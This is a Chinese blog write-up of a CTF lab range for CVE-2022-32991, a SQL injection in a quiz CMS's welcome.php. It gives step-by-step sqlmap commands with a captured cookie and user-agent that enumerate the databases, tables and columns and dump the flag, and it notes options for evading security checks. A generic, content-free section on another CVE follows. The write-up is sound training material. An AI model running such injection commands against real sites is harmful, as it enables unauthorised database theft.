[春秋云镜] CVE-2022-32991 靶场详解

目录

前期准备

工具

渗透测试

靶场提示

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

0x04 获取cookie和user-agent

0x05 sqlmap爆破

前期准备

工具

1.Burpsuite(对应java环境)

2.Sqlmap(对应python环境)

渗透测试

靶场提示

该CMS的welcome.php中存在SQL注入攻击

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

官方有提示:该CMS的welcome.php中存在SQL注入攻击。发现注入点。

0x04 获取cookie和user-agent

这存在两种方法,获取cookie是为了绕过身份验证,user-agent和random-agent主要是为了绕过客户端认证,否则容易被安全机制拦截。

方法一:抓包

点击第一个进去之后抓包

网页设置好代理->burpsuite设置代理->刷新页面

方法二:鼠标右键->检查->网络-> 刷新->找到第一个包,查看cookie和user-agent。

获取信息

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56
​
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669169499

0x05 sqlmap爆破

验证是否存在注入

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch

爆破数据库

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch --dbs

爆破表

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf --tables

爆破列

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag --columns

 

爆破字段

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag -C flag --dump

0x06 获得flag

 flag{e9dd7838-f6fe-4adf-a2a3-e7a49ed92a91}

总结

本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。

-p                       指定注入的参数
--batch                  使用默认方法去执行sql注入
--random-agent           随机更换请求头
--user-agent             使用指定的请求头
--cookie                 使用指定cookie

### 关于春秋 CVE-2022-28512 的分析 目前,在提供的引用资料中并未提及有关 **CVE-2022-28512** 的具体细节[^1][^2][^3][^4]。然而,基于常见的漏洞命名规则以及以往类似案例的经验,可以推测该编号可能对应某一特定版本中的安全缺陷。 #### 可能的影响范围 通常情况下,带有此类编号的安全问题主要涉及以下几个方面: - 应用程序逻辑错误可能导致权限提升或数据泄露。 - 配置不当引发未授权访问风险。 - 输入验证不足造成注入攻击隐患。 对于具体的 **影响范围** ,如果此漏洞存在于某个软件产品里,则受影响的对象应包括运行相应版本的所有实例;同时还要考虑是否存在连锁反应——即一个初始的小型弱点是否会被恶意行为者利用来触发更严重的后果。 #### 建议采取的措施 尽管缺乏针对 **CVE-2022-28512** 的确切描述,但仍可遵循通用的最佳实践来进行防护: 1. 更新至最新稳定版:厂商往往会迅速发布补丁解决已知威胁; 2. 实施最小化原则:仅授予必要的操作权限给用户账户; 3. 定期审查日志记录:及时发现异常活动迹象以便快速响应处理潜在入侵事件。 以下是实现上述部分建议的一个简单Python脚本示例用于检查系统更新状态: ```python import subprocess def check_updates(): try: result = subprocess.run(['apt', 'list', '--upgradable'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) if "Listing..." not in result.stdout and len(result.stdout.strip()) > 0 : print("There are available updates:") print(result.stdout) else: print("Your system is up to date.") except Exception as e: print(f"An error occurred while checking for updates: {e}") check_updates() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值